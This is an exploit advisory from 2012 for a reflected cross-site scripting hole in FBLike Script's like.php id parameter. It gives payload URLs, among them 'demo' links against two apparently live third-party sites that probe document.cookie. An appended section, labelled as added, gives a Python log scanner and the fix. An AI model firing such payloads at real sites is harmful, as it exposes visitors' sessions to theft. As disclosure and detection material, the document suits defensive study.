FBLike Script suffers from a cross site scripting vulnerability.
# Exploit Title: FBLike Script Cross Site Scripting
# Google Dork: Copyright © 2010 FBLike Script
# Date: 25/03/2012 1:53 PM #EST
# Author: Crim3R
# Software Link: http://zumset.com/product/fbilike_script_v100.html
# Version: v1.00
# Tested on: all
# CVE : XSS
========================================
The XSS is in like.php, in the id parameter:
http://127.0.0.1/fbilike/like.php?id="><script>alert(XSS-By-Crim3R)</script>
========================================
Demo:
http://www.talkgold.com/bans/like.php?id=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://ilikenigeria.com/like.php?id=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
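Added example (not part of the original advisory): a Python check that scans web access logs for the request shape shown above, flagging like.php requests whose id parameter decodes to HTML markup characters, including double-encoded forms. The log lines, client addresses and function names are constructed for illustration, and the combined access-log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Characters that let a reflected value close an HTML attribute or open a tag.
MARKUP_CHARS = set('"\'<>')

# Constructed sample log lines (documentation-range addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [25/Mar/2012:13:53:01 -0500] "GET /fbilike/like.php?id=42 HTTP/1.1" 200 512',
    '203.0.113.9 - - [25/Mar/2012:13:54:10 -0500] "GET /fbilike/like.php?id=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E HTTP/1.1" 200 530',
    '198.51.100.4 - - [25/Mar/2012:13:55:42 -0500] "GET /fbilike/like.php?id=%2522%253E%253Cscript%253E HTTP/1.1" 200 530',
    '198.51.100.5 - - [25/Mar/2012:13:56:00 -0500] "GET /index.php?id=%3Cb%3E HTTP/1.1" 200 100',
]

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded values (%253C) are normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_like_requests(log_lines):
    """Return (client_ip, decoded_id) for like.php requests whose id carries markup."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.endswith("/like.php"):
            continue  # only the script named in the advisory is checked
        # parse_qs decodes once; fully_decode handles any further encoding layers.
        for raw in parse_qs(url.query, keep_blank_values=True).get("id", []):
            value = fully_decode(raw)
            if MARKUP_CHARS & set(value):
                hits.append((line.split(" ", 1)[0], value))
    return hits

if __name__ == "__main__":
    for client, value in suspicious_like_requests(SAMPLE_LOG):
        print(f"{client} sent markup in like.php id: {value!r}")
```

Log review only finds attempts; the fix is for like.php to HTML-encode id wherever it is written into the page (in PHP, htmlspecialchars with ENT_QUOTES) or to reject values that are not of the expected form.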
Thanks to: H3X - Einstein - thE_Knight - Naboodgar - C0NS74NTINE - Cruel - S.a.S - Net.Plus - Mehdi.H4ckCity - 2MzRp - Mikili - iC0der - farbodmahini - M.Prince - IrIst -
==============Crim3R=====================
All SST&HC Members